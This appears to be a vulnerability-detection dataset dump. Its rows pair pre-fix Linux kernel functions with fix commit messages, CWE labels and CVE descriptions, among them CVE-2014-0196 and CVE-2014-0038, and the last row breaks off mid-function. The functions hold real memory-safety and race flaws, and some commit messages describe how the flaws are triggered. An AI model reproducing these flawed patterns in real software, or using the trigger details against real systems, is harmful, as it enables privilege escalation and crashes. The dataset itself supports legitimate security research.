idx
int64 0
522k
| project
stringclasses 631
values | commit_id
stringlengths 7
40
| project_url
stringclasses 630
values | commit_url
stringlengths 4
164
| commit_message
stringlengths 0
11.5k
| target
int64 0
1
| func
stringlengths 5
484k
| func_hash
float64 1,559,120,642,045,605,000,000,000B
340,279,892,905,069,500,000,000,000,000B
| file_name
stringlengths 4
45
| file_hash
float64 25,942,829,220,065,710,000,000,000B
340,272,304,251,680,200,000,000,000,000B
⌀ | cwe
sequencelengths 0
1
| cve
stringlengths 4
16
| cve_desc
stringlengths 0
2.3k
| nvd_url
stringlengths 37
49
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1,339 | linux | 86acdca1b63e6890540fa19495cfc708beff3d8b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/86acdca1b63e6890540fa19495cfc708beff3d8b | fix autofs/afs/etc. magic mountpoint breakage
We end up trying to kfree() nd.last.name on open("/mnt/tmp", O_CREAT)
if /mnt/tmp is an autofs direct mount. The reason is that nd.last_type
is bogus here; we want LAST_BIND for everything of that kind and we
get LAST_NORM left over from finding parent directory.
So make sure that it *is* set properly; set to LAST_BIND before
doing ->follow_link() - for normal symlinks it will be changed
by __vfs_follow_link() and everything else needs it set that way.
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | static __always_inline int __do_follow_link(struct path *path, struct nameidata *nd)
{
int error;
void *cookie;
struct dentry *dentry = path->dentry;
touch_atime(path->mnt, dentry);
nd_set_link(nd, NULL);
if (path->mnt != nd->path.mnt) {
path_to_nameidata(path, nd);
dget(dentry);
}
mntget(path->mnt);
cookie = dentry->d_inode->i_op->follow_link(dentry, nd);
error = PTR_ERR(cookie);
if (!IS_ERR(cookie)) {
char *s = nd_get_link(nd);
error = 0;
if (s)
error = __vfs_follow_link(nd, s);
else if (nd->last_type == LAST_BIND) {
error = force_reval_path(&nd->path, nd);
if (error)
path_put(&nd->path);
}
if (dentry->d_inode->i_op->put_link)
dentry->d_inode->i_op->put_link(dentry, nd, cookie);
}
return error;
}
| 256,736,984,301,789,380,000,000,000,000,000,000,000 | namei.c | 213,658,505,254,054,250,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-0203 | The __do_follow_link function in fs/namei.c in the Linux kernel before 2.6.33 does not properly handle the last pathname component during use of certain filesystems, which allows local users to cause a denial of service (incorrect free operations and system crash) via an open system call. | https://nvd.nist.gov/vuln/detail/CVE-2014-0203 |
1,341 | linux | 4291086b1f081b869c6d79e5b7441633dc3ace00 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/4291086b1f081b869c6d79e5b7441633dc3ace00 | n_tty: Fix n_tty_write crash when echoing in raw mode
The tty atomic_write_lock does not provide an exclusion guarantee for
the tty driver if the termios settings are LECHO & !OPOST. And since
it is unexpected and not allowed to call TTY buffer helpers like
tty_insert_flip_string concurrently, this may lead to crashes when
concurrect writers call pty_write. In that case the following two
writers:
* the ECHOing from a workqueue and
* pty_write from the process
race and can overflow the corresponding TTY buffer like follows.
If we look into tty_insert_flip_string_fixed_flag, there is:
int space = __tty_buffer_request_room(port, goal, flags);
struct tty_buffer *tb = port->buf.tail;
...
memcpy(char_buf_ptr(tb, tb->used), chars, space);
...
tb->used += space;
so the race of the two can result in something like this:
A B
__tty_buffer_request_room
__tty_buffer_request_room
memcpy(buf(tb->used), ...)
tb->used += space;
memcpy(buf(tb->used), ...) ->BOOM
B's memcpy is past the tty_buffer due to the previous A's tb->used
increment.
Since the N_TTY line discipline input processing can output
concurrently with a tty write, obtain the N_TTY ldisc output_lock to
serialize echo output with normal tty writes. This ensures the tty
buffer helper tty_insert_flip_string is not called concurrently and
everything is fine.
Note that this is nicely reproducible by an ordinary user using
forkpty and some setup around that (raw termios + ECHO). And it is
present in kernels at least after commit
d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
use the normal buffering logic) in 2.6.31-rc3.
js: add more info to the commit log
js: switch to bool
js: lock unconditionally
js: lock only the tty->ops->write call
References: CVE-2014-0196
Reported-and-tested-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Alan Cox <alan@lxorguk.ukuu.org.uk>
Cc: <stable@vger.kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> | 1 | static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
const unsigned char *buf, size_t nr)
{
const unsigned char *b = buf;
DECLARE_WAITQUEUE(wait, current);
int c;
ssize_t retval = 0;
/* Job control check -- must be done at start (POSIX.1 7.1.1.4). */
if (L_TOSTOP(tty) && file->f_op->write != redirected_tty_write) {
retval = tty_check_change(tty);
if (retval)
return retval;
}
down_read(&tty->termios_rwsem);
/* Write out any echoed characters that are still pending */
process_echoes(tty);
add_wait_queue(&tty->write_wait, &wait);
while (1) {
set_current_state(TASK_INTERRUPTIBLE);
if (signal_pending(current)) {
retval = -ERESTARTSYS;
break;
}
if (tty_hung_up_p(file) || (tty->link && !tty->link->count)) {
retval = -EIO;
break;
}
if (O_OPOST(tty)) {
while (nr > 0) {
ssize_t num = process_output_block(tty, b, nr);
if (num < 0) {
if (num == -EAGAIN)
break;
retval = num;
goto break_out;
}
b += num;
nr -= num;
if (nr == 0)
break;
c = *b;
if (process_output(c, tty) < 0)
break;
b++; nr--;
}
if (tty->ops->flush_chars)
tty->ops->flush_chars(tty);
} else {
while (nr > 0) {
c = tty->ops->write(tty, b, nr);
if (c < 0) {
retval = c;
goto break_out;
}
if (!c)
break;
b += c;
nr -= c;
}
}
if (!nr)
break;
if (file->f_flags & O_NONBLOCK) {
retval = -EAGAIN;
break;
}
up_read(&tty->termios_rwsem);
schedule();
down_read(&tty->termios_rwsem);
}
break_out:
__set_current_state(TASK_RUNNING);
remove_wait_queue(&tty->write_wait, &wait);
if (b - buf != nr && tty->fasync)
set_bit(TTY_DO_WRITE_WAKEUP, &tty->flags);
up_read(&tty->termios_rwsem);
return (b - buf) ? b - buf : retval;
}
| 177,764,399,866,911,630,000,000,000,000,000,000,000 | n_tty.c | 13,693,576,808,205,118,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2014-0196 | The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings. | https://nvd.nist.gov/vuln/detail/CVE-2014-0196 |
1,342 | linux | d8316f3991d207fe32881a9ac20241be8fa2bad0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/d8316f3991d207fe32881a9ac20241be8fa2bad0 | vhost: fix total length when packets are too short
When mergeable buffers are disabled, and the
incoming packet is too large for the rx buffer,
get_rx_bufs returns success.
This was intentional in order for make recvmsg
truncate the packet and then handle_rx would
detect err != sock_len and drop it.
Unfortunately we pass the original sock_len to
recvmsg - which means we use parts of iov not fully
validated.
Fix this up by detecting this overrun and doing packet drop
immediately.
CVE-2014-0077
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static void handle_rx(struct vhost_net *net)
{
struct vhost_net_virtqueue *nvq = &net->vqs[VHOST_NET_VQ_RX];
struct vhost_virtqueue *vq = &nvq->vq;
unsigned uninitialized_var(in), log;
struct vhost_log *vq_log;
struct msghdr msg = {
.msg_name = NULL,
.msg_namelen = 0,
.msg_control = NULL, /* FIXME: get and handle RX aux data. */
.msg_controllen = 0,
.msg_iov = vq->iov,
.msg_flags = MSG_DONTWAIT,
};
struct virtio_net_hdr_mrg_rxbuf hdr = {
.hdr.flags = 0,
.hdr.gso_type = VIRTIO_NET_HDR_GSO_NONE
};
size_t total_len = 0;
int err, mergeable;
s16 headcount;
size_t vhost_hlen, sock_hlen;
size_t vhost_len, sock_len;
struct socket *sock;
mutex_lock(&vq->mutex);
sock = vq->private_data;
if (!sock)
goto out;
vhost_disable_notify(&net->dev, vq);
vhost_hlen = nvq->vhost_hlen;
sock_hlen = nvq->sock_hlen;
vq_log = unlikely(vhost_has_feature(&net->dev, VHOST_F_LOG_ALL)) ?
vq->log : NULL;
mergeable = vhost_has_feature(&net->dev, VIRTIO_NET_F_MRG_RXBUF);
while ((sock_len = peek_head_len(sock->sk))) {
sock_len += sock_hlen;
vhost_len = sock_len + vhost_hlen;
headcount = get_rx_bufs(vq, vq->heads, vhost_len,
&in, vq_log, &log,
likely(mergeable) ? UIO_MAXIOV : 1);
/* On error, stop handling until the next kick. */
if (unlikely(headcount < 0))
break;
/* OK, now we need to know about added descriptors. */
if (!headcount) {
if (unlikely(vhost_enable_notify(&net->dev, vq))) {
/* They have slipped one in as we were
* doing that: check again. */
vhost_disable_notify(&net->dev, vq);
continue;
}
/* Nothing new? Wait for eventfd to tell us
* they refilled. */
break;
}
/* We don't need to be notified again. */
if (unlikely((vhost_hlen)))
/* Skip header. TODO: support TSO. */
move_iovec_hdr(vq->iov, nvq->hdr, vhost_hlen, in);
else
/* Copy the header for use in VIRTIO_NET_F_MRG_RXBUF:
* needed because recvmsg can modify msg_iov. */
copy_iovec_hdr(vq->iov, nvq->hdr, sock_hlen, in);
msg.msg_iovlen = in;
err = sock->ops->recvmsg(NULL, sock, &msg,
sock_len, MSG_DONTWAIT | MSG_TRUNC);
/* Userspace might have consumed the packet meanwhile:
* it's not supposed to do this usually, but might be hard
* to prevent. Discard data we got (if any) and keep going. */
if (unlikely(err != sock_len)) {
pr_debug("Discarded rx packet: "
" len %d, expected %zd\n", err, sock_len);
vhost_discard_vq_desc(vq, headcount);
continue;
}
if (unlikely(vhost_hlen) &&
memcpy_toiovecend(nvq->hdr, (unsigned char *)&hdr, 0,
vhost_hlen)) {
vq_err(vq, "Unable to write vnet_hdr at addr %p\n",
vq->iov->iov_base);
break;
}
/* TODO: Should check and handle checksum. */
if (likely(mergeable) &&
memcpy_toiovecend(nvq->hdr, (unsigned char *)&headcount,
offsetof(typeof(hdr), num_buffers),
sizeof hdr.num_buffers)) {
vq_err(vq, "Failed num_buffers write");
vhost_discard_vq_desc(vq, headcount);
break;
}
vhost_add_used_and_signal_n(&net->dev, vq, vq->heads,
headcount);
if (unlikely(vq_log))
vhost_log_write(vq, vq_log, log, vhost_len);
total_len += vhost_len;
if (unlikely(total_len >= VHOST_NET_WEIGHT)) {
vhost_poll_queue(&vq->poll);
break;
}
}
out:
mutex_unlock(&vq->mutex);
}
| 327,050,017,452,533,930,000,000,000,000,000,000,000 | net.c | 84,928,519,751,752,360,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-0077 | drivers/vhost/net.c in the Linux kernel before 3.13.10, when mergeable buffers are disabled, does not properly validate packet lengths, which allows guest OS users to cause a denial of service (memory corruption and host OS crash) or possibly gain privileges on the host OS via crafted packets, related to the handle_rx and get_rx_bufs functions. | https://nvd.nist.gov/vuln/detail/CVE-2014-0077 |
1,343 | linux | 5d81de8e8667da7135d3a32a964087c0faf5483f | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/5d81de8e8667da7135d3a32a964087c0faf5483f | cifs: ensure that uncached writes handle unmapped areas correctly
It's possible for userland to pass down an iovec via writev() that has a
bogus user pointer in it. If that happens and we're doing an uncached
write, then we can end up getting less bytes than we expect from the
call to iov_iter_copy_from_user. This is CVE-2014-0069
cifs_iovec_write isn't set up to handle that situation however. It'll
blindly keep chugging through the page array and not filling those pages
with anything useful. Worse yet, we'll later end up with a negative
number in wdata->tailsz, which will confuse the sending routines and
cause an oops at the very least.
Fix this by having the copy phase of cifs_iovec_write stop copying data
in this situation and send the last write as a short one. At the same
time, we want to avoid sending a zero-length write to the server, so
break out of the loop and set rc to -EFAULT if that happens. This also
allows us to handle the case where no address in the iovec is valid.
[Note: Marking this for stable on v3.4+ kernels, but kernels as old as
v2.6.38 may have a similar problem and may need similar fix]
Cc: <stable@vger.kernel.org> # v3.4+
Reviewed-by: Pavel Shilovsky <piastry@etersoft.ru>
Reported-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Steve French <smfrench@gmail.com> | 1 | cifs_iovec_write(struct file *file, const struct iovec *iov,
unsigned long nr_segs, loff_t *poffset)
{
unsigned long nr_pages, i;
size_t copied, len, cur_len;
ssize_t total_written = 0;
loff_t offset;
struct iov_iter it;
struct cifsFileInfo *open_file;
struct cifs_tcon *tcon;
struct cifs_sb_info *cifs_sb;
struct cifs_writedata *wdata, *tmp;
struct list_head wdata_list;
int rc;
pid_t pid;
len = iov_length(iov, nr_segs);
if (!len)
return 0;
rc = generic_write_checks(file, poffset, &len, 0);
if (rc)
return rc;
INIT_LIST_HEAD(&wdata_list);
cifs_sb = CIFS_SB(file->f_path.dentry->d_sb);
open_file = file->private_data;
tcon = tlink_tcon(open_file->tlink);
if (!tcon->ses->server->ops->async_writev)
return -ENOSYS;
offset = *poffset;
if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
pid = open_file->pid;
else
pid = current->tgid;
iov_iter_init(&it, iov, nr_segs, len, 0);
do {
size_t save_len;
nr_pages = get_numpages(cifs_sb->wsize, len, &cur_len);
wdata = cifs_writedata_alloc(nr_pages,
cifs_uncached_writev_complete);
if (!wdata) {
rc = -ENOMEM;
break;
}
rc = cifs_write_allocate_pages(wdata->pages, nr_pages);
if (rc) {
kfree(wdata);
break;
}
save_len = cur_len;
for (i = 0; i < nr_pages; i++) {
copied = min_t(const size_t, cur_len, PAGE_SIZE);
copied = iov_iter_copy_from_user(wdata->pages[i], &it,
0, copied);
cur_len -= copied;
iov_iter_advance(&it, copied);
}
cur_len = save_len - cur_len;
wdata->sync_mode = WB_SYNC_ALL;
wdata->nr_pages = nr_pages;
wdata->offset = (__u64)offset;
wdata->cfile = cifsFileInfo_get(open_file);
wdata->pid = pid;
wdata->bytes = cur_len;
wdata->pagesz = PAGE_SIZE;
wdata->tailsz = cur_len - ((nr_pages - 1) * PAGE_SIZE);
rc = cifs_uncached_retry_writev(wdata);
if (rc) {
kref_put(&wdata->refcount,
cifs_uncached_writedata_release);
break;
}
list_add_tail(&wdata->list, &wdata_list);
offset += cur_len;
len -= cur_len;
} while (len > 0);
/*
* If at least one write was successfully sent, then discard any rc
* value from the later writes. If the other write succeeds, then
* we'll end up returning whatever was written. If it fails, then
* we'll get a new rc value from that.
*/
if (!list_empty(&wdata_list))
rc = 0;
/*
* Wait for and collect replies for any successful sends in order of
* increasing offset. Once an error is hit or we get a fatal signal
* while waiting, then return without waiting for any more replies.
*/
restart_loop:
list_for_each_entry_safe(wdata, tmp, &wdata_list, list) {
if (!rc) {
/* FIXME: freezable too? */
rc = wait_for_completion_killable(&wdata->done);
if (rc)
rc = -EINTR;
else if (wdata->result)
rc = wdata->result;
else
total_written += wdata->bytes;
/* resend call if it's a retryable error */
if (rc == -EAGAIN) {
rc = cifs_uncached_retry_writev(wdata);
goto restart_loop;
}
}
list_del_init(&wdata->list);
kref_put(&wdata->refcount, cifs_uncached_writedata_release);
}
if (total_written > 0)
*poffset += total_written;
cifs_stats_bytes_written(tcon, total_written);
return total_written ? total_written : (ssize_t)rc;
}
| 82,332,909,522,185,400,000,000,000,000,000,000,000 | file.c | 284,112,246,344,305,900,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2014-0069 | The cifs_iovec_write function in fs/cifs/file.c in the Linux kernel through 3.13.5 does not properly handle uncached write operations that copy fewer than the requested number of bytes, which allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory corruption and system crash), or possibly gain privileges via a writev system call with a crafted pointer. | https://nvd.nist.gov/vuln/detail/CVE-2014-0069 |
1,344 | linux | a08d3b3b99efd509133946056531cdf8f3a0c09b | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/a08d3b3b99efd509133946056531cdf8f3a0c09b | kvm: x86: fix emulator buffer overflow (CVE-2014-0049)
The problem occurs when the guest performs a pusha with the stack
address pointing to an mmio address (or an invalid guest physical
address) to start with, but then extending into an ordinary guest
physical address. When doing repeated emulated pushes
emulator_read_write sets mmio_needed to 1 on the first one. On a
later push when the stack points to regular memory,
mmio_nr_fragments is set to 0, but mmio_is_needed is not set to 0.
As a result, KVM exits to userspace, and then returns to
complete_emulated_mmio. In complete_emulated_mmio
vcpu->mmio_cur_fragment is incremented. The termination condition of
vcpu->mmio_cur_fragment == vcpu->mmio_nr_fragments is never achieved.
The code bounces back and fourth to userspace incrementing
mmio_cur_fragment past it's buffer. If the guest does nothing else it
eventually leads to a a crash on a memcpy from invalid memory address.
However if a guest code can cause the vm to be destroyed in another
vcpu with excellent timing, then kvm_clear_async_pf_completion_queue
can be used by the guest to control the data that's pointed to by the
call to cancel_work_item, which can be used to gain execution.
Fixes: f78146b0f9230765c6315b2e14f56112513389ad
Signed-off-by: Andrew Honig <ahonig@google.com>
Cc: stable@vger.kernel.org (3.5+)
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> | 1 | static int complete_emulated_mmio(struct kvm_vcpu *vcpu)
{
struct kvm_run *run = vcpu->run;
struct kvm_mmio_fragment *frag;
unsigned len;
BUG_ON(!vcpu->mmio_needed);
/* Complete previous fragment */
frag = &vcpu->mmio_fragments[vcpu->mmio_cur_fragment];
len = min(8u, frag->len);
if (!vcpu->mmio_is_write)
memcpy(frag->data, run->mmio.data, len);
if (frag->len <= 8) {
/* Switch to the next fragment. */
frag++;
vcpu->mmio_cur_fragment++;
} else {
/* Go forward to the next mmio piece. */
frag->data += len;
frag->gpa += len;
frag->len -= len;
}
if (vcpu->mmio_cur_fragment == vcpu->mmio_nr_fragments) {
vcpu->mmio_needed = 0;
/* FIXME: return into emulator if single-stepping. */
if (vcpu->mmio_is_write)
return 1;
vcpu->mmio_read_completed = 1;
return complete_emulated_io(vcpu);
}
run->exit_reason = KVM_EXIT_MMIO;
run->mmio.phys_addr = frag->gpa;
if (vcpu->mmio_is_write)
memcpy(run->mmio.data, frag->data, min(8u, frag->len));
run->mmio.len = min(8u, frag->len);
run->mmio.is_write = vcpu->mmio_is_write;
vcpu->arch.complete_userspace_io = complete_emulated_mmio;
return 0;
}
| 64,111,150,231,177,240,000,000,000,000,000,000,000 | x86.c | 98,159,114,997,778,440,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2014-0049 | Buffer overflow in the complete_emulated_mmio function in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6 allows guest OS users to execute arbitrary code on the host OS by leveraging a loop that triggers an invalid memory copy affecting certain cancel_work_item data. | https://nvd.nist.gov/vuln/detail/CVE-2014-0049 |
1,345 | linux | 2def2ef2ae5f3990aabdbe8a755911902707d268 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/2def2ef2ae5f3990aabdbe8a755911902707d268 | x86, x32: Correct invalid use of user timespec in the kernel
The x32 case for the recvmsg() timout handling is broken:
asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
unsigned int vlen, unsigned int flags,
struct compat_timespec __user *timeout)
{
int datagrams;
struct timespec ktspec;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (COMPAT_USE_64BIT_TIME)
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT,
(struct timespec *) timeout);
...
The timeout pointer parameter is provided by userland (hence the __user
annotation) but for x32 syscalls it's simply cast to a kernel pointer
and is passed to __sys_recvmmsg which will eventually directly
dereference it for both reading and writing. Other callers to
__sys_recvmmsg properly copy from userland to the kernel first.
The bug was introduced by commit ee4fa23c4bfc ("compat: Use
COMPAT_USE_64BIT_TIME in net/compat.c") and should affect all kernels
since 3.4 (and perhaps vendor kernels if they backported x32 support
along with this code).
Note that CONFIG_X86_X32_ABI gets enabled at build time and only if
CONFIG_X86_X32 is enabled and ld can build x32 executables.
Other uses of COMPAT_USE_64BIT_TIME seem fine.
This addresses CVE-2014-0038.
Signed-off-by: PaX Team <pageexec@freemail.hu>
Signed-off-by: H. Peter Anvin <hpa@linux.intel.com>
Cc: <stable@vger.kernel.org> # v3.4+
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
unsigned int vlen, unsigned int flags,
struct compat_timespec __user *timeout)
{
int datagrams;
struct timespec ktspec;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (COMPAT_USE_64BIT_TIME)
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT,
(struct timespec *) timeout);
if (timeout == NULL)
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT, NULL);
if (get_compat_timespec(&ktspec, timeout))
return -EFAULT;
datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT, &ktspec);
if (datagrams > 0 && put_compat_timespec(&ktspec, timeout))
datagrams = -EFAULT;
return datagrams;
}
| 89,530,709,225,040,190,000,000,000,000,000,000,000 | compat.c | 107,634,465,611,674,530,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2014-0038 | The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter. | https://nvd.nist.gov/vuln/detail/CVE-2014-0038 |
1,346 | linux | d558023207e008a4476a3b7bb8706b2a2bf5d84f | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/d558023207e008a4476a3b7bb8706b2a2bf5d84f | aio: prevent double free in ioctx_alloc
ioctx_alloc() calls aio_setup_ring() to allocate a ring. If aio_setup_ring()
fails to do so it would call aio_free_ring() before returning, but
ioctx_alloc() would call aio_free_ring() again causing a double free of
the ring.
This is easily reproducible from userspace.
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Benjamin LaHaise <bcrl@kvack.org> | 1 | static struct kioctx *ioctx_alloc(unsigned nr_events)
{
struct mm_struct *mm = current->mm;
struct kioctx *ctx;
int err = -ENOMEM;
/*
* We keep track of the number of available ringbuffer slots, to prevent
* overflow (reqs_available), and we also use percpu counters for this.
*
* So since up to half the slots might be on other cpu's percpu counters
* and unavailable, double nr_events so userspace sees what they
* expected: additionally, we move req_batch slots to/from percpu
* counters at a time, so make sure that isn't 0:
*/
nr_events = max(nr_events, num_possible_cpus() * 4);
nr_events *= 2;
/* Prevent overflows */
if ((nr_events > (0x10000000U / sizeof(struct io_event))) ||
(nr_events > (0x10000000U / sizeof(struct kiocb)))) {
pr_debug("ENOMEM: nr_events too high\n");
return ERR_PTR(-EINVAL);
}
if (!nr_events || (unsigned long)nr_events > (aio_max_nr * 2UL))
return ERR_PTR(-EAGAIN);
ctx = kmem_cache_zalloc(kioctx_cachep, GFP_KERNEL);
if (!ctx)
return ERR_PTR(-ENOMEM);
ctx->max_reqs = nr_events;
if (percpu_ref_init(&ctx->users, free_ioctx_users))
goto err;
if (percpu_ref_init(&ctx->reqs, free_ioctx_reqs))
goto err;
spin_lock_init(&ctx->ctx_lock);
spin_lock_init(&ctx->completion_lock);
mutex_init(&ctx->ring_lock);
init_waitqueue_head(&ctx->wait);
INIT_LIST_HEAD(&ctx->active_reqs);
ctx->cpu = alloc_percpu(struct kioctx_cpu);
if (!ctx->cpu)
goto err;
if (aio_setup_ring(ctx) < 0)
goto err;
atomic_set(&ctx->reqs_available, ctx->nr_events - 1);
ctx->req_batch = (ctx->nr_events - 1) / (num_possible_cpus() * 4);
if (ctx->req_batch < 1)
ctx->req_batch = 1;
/* limit the number of system wide aios */
spin_lock(&aio_nr_lock);
if (aio_nr + nr_events > (aio_max_nr * 2UL) ||
aio_nr + nr_events < aio_nr) {
spin_unlock(&aio_nr_lock);
err = -EAGAIN;
goto err;
}
aio_nr += ctx->max_reqs;
spin_unlock(&aio_nr_lock);
percpu_ref_get(&ctx->users); /* io_setup() will drop this ref */
err = ioctx_add_table(ctx, mm);
if (err)
goto err_cleanup;
pr_debug("allocated ioctx %p[%ld]: mm=%p mask=0x%x\n",
ctx, ctx->user_id, mm, ctx->nr_events);
return ctx;
err_cleanup:
aio_nr_sub(ctx->max_reqs);
err:
aio_free_ring(ctx);
free_percpu(ctx->cpu);
free_percpu(ctx->reqs.pcpu_count);
free_percpu(ctx->users.pcpu_count);
kmem_cache_free(kioctx_cachep, ctx);
pr_debug("error allocating ioctx %d\n", err);
return ERR_PTR(err);
}
| 338,752,304,203,713,800,000,000,000,000,000,000,000 | aio.c | 50,064,682,128,123,810,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2013-7348 | Double free vulnerability in the ioctx_alloc function in fs/aio.c in the Linux kernel before 3.12.4 allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via vectors involving an error condition in the aio_setup_ring function. | https://nvd.nist.gov/vuln/detail/CVE-2013-7348 |
1,347 | linux | c2349758acf1874e4c2b93fe41d072336f1a31d0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/c2349758acf1874e4c2b93fe41d072336f1a31d0 | rds: prevent dereference of a NULL device
Binding might result in a NULL device, which is dereferenced
causing this BUG:
[ 1317.260548] BUG: unable to handle kernel NULL pointer dereference at 000000000000097
4
[ 1317.261847] IP: [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110
[ 1317.263315] PGD 418bcb067 PUD 3ceb21067 PMD 0
[ 1317.263502] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC
[ 1317.264179] Dumping ftrace buffer:
[ 1317.264774] (ftrace buffer empty)
[ 1317.265220] Modules linked in:
[ 1317.265824] CPU: 4 PID: 836 Comm: trinity-child46 Tainted: G W 3.13.0-rc4-
next-20131218-sasha-00013-g2cebb9b-dirty #4159
[ 1317.267415] task: ffff8803ddf33000 ti: ffff8803cd31a000 task.ti: ffff8803cd31a000
[ 1317.268399] RIP: 0010:[<ffffffff84225f52>] [<ffffffff84225f52>] rds_ib_laddr_check+
0x82/0x110
[ 1317.269670] RSP: 0000:ffff8803cd31bdf8 EFLAGS: 00010246
[ 1317.270230] RAX: 0000000000000000 RBX: ffff88020b0dd388 RCX: 0000000000000000
[ 1317.270230] RDX: ffffffff8439822e RSI: 00000000000c000a RDI: 0000000000000286
[ 1317.270230] RBP: ffff8803cd31be38 R08: 0000000000000000 R09: 0000000000000000
[ 1317.270230] R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000000
[ 1317.270230] R13: 0000000054086700 R14: 0000000000a25de0 R15: 0000000000000031
[ 1317.270230] FS: 00007ff40251d700(0000) GS:ffff88022e200000(0000) knlGS:000000000000
0000
[ 1317.270230] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 1317.270230] CR2: 0000000000000974 CR3: 00000003cd478000 CR4: 00000000000006e0
[ 1317.270230] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 1317.270230] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000090602
[ 1317.270230] Stack:
[ 1317.270230] 0000000054086700 5408670000a25de0 5408670000000002 0000000000000000
[ 1317.270230] ffffffff84223542 00000000ea54c767 0000000000000000 ffffffff86d26160
[ 1317.270230] ffff8803cd31be68 ffffffff84223556 ffff8803cd31beb8 ffff8800c6765280
[ 1317.270230] Call Trace:
[ 1317.270230] [<ffffffff84223542>] ? rds_trans_get_preferred+0x42/0xa0
[ 1317.270230] [<ffffffff84223556>] rds_trans_get_preferred+0x56/0xa0
[ 1317.270230] [<ffffffff8421c9c3>] rds_bind+0x73/0xf0
[ 1317.270230] [<ffffffff83e4ce62>] SYSC_bind+0x92/0xf0
[ 1317.270230] [<ffffffff812493f8>] ? context_tracking_user_exit+0xb8/0x1d0
[ 1317.270230] [<ffffffff8119313d>] ? trace_hardirqs_on+0xd/0x10
[ 1317.270230] [<ffffffff8107a852>] ? syscall_trace_enter+0x32/0x290
[ 1317.270230] [<ffffffff83e4cece>] SyS_bind+0xe/0x10
[ 1317.270230] [<ffffffff843a6ad0>] tracesys+0xdd/0xe2
[ 1317.270230] Code: 00 8b 45 cc 48 8d 75 d0 48 c7 45 d8 00 00 00 00 66 c7 45 d0 02 00
89 45 d4 48 89 df e8 78 49 76 ff 41 89 c4 85 c0 75 0c 48 8b 03 <80> b8 74 09 00 00 01 7
4 06 41 bc 9d ff ff ff f6 05 2a b6 c2 02
[ 1317.270230] RIP [<ffffffff84225f52>] rds_ib_laddr_check+0x82/0x110
[ 1317.270230] RSP <ffff8803cd31bdf8>
[ 1317.270230] CR2: 0000000000000974
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int rds_ib_laddr_check(__be32 addr)
{
int ret;
struct rdma_cm_id *cm_id;
struct sockaddr_in sin;
/* Create a CMA ID and try to bind it. This catches both
* IB and iWARP capable NICs.
*/
cm_id = rdma_create_id(NULL, NULL, RDMA_PS_TCP, IB_QPT_RC);
if (IS_ERR(cm_id))
return PTR_ERR(cm_id);
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = addr;
/* rdma_bind_addr will only succeed for IB & iWARP devices */
ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
/* due to this, we will claim to support iWARP devices unless we
check node_type. */
if (ret || cm_id->device->node_type != RDMA_NODE_IB_CA)
ret = -EADDRNOTAVAIL;
rdsdebug("addr %pI4 ret %d node type %d\n",
&addr, ret,
cm_id->device ? cm_id->device->node_type : -1);
